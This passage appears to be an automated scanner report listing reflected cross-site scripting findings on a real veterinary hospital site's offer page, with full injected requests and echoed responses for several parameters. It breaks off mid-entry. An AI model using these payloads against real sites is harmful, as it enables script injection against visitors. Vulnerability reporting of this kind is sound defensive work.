GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc &referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:56 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=cuk6kin33gemm42a0q0adqee65; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc &referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3...[SNIP]...
2.39. http://www.vcahospitals.com/main/offer [r parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the r request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd45"><script>alert(1)</script>a545781095a was submitted in the r parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?r=E13fbd45"><script>alert(1)</script>a545781095a &utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:03:51 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=vjr1h35soi9lhsqsn64d78ocd1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10834 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13fbd45"><script>alert(1)</script>a545781095a &utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.40. http://www.vcahospitals.com/main/offer [referer parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df6e8"><script>alert(1)</script>093b3b8f1c4 was submitted in the referer parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4 &state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:01 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=g8pte6n4esqiq4spacl1mgj7g0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... .html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4 &state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname...[SNIP]...
2.41. http://www.vcahospitals.com/main/offer [state parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4e4"><script>alert(1)</script>eea3abc545b was submitted in the state parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b &guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:57 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14501 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b &guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.42. http://www.vcahospitals.com/main/offer [submit parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82bfe"><script>alert(1)</script>eac88d58519 was submitted in the submit parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519 &token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:12 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=hhabg9v3lhlbkflav80vstra25; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... 400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519 &token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3...[SNIP]...
2.43. http://www.vcahospitals.com/main/offer [token parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de71"><script>alert(1)</script>cc1ba56418e was submitted in the token parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e &tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:17 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=eq5ak2i8c2d6bskvfdik8qphb5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... 88BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e &tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%2...[SNIP]...
2.44. http://www.vcahospitals.com/main/offer [tollfree parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e9e"><script>alert(1)</script>8361d0a233a was submitted in the tollfree parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
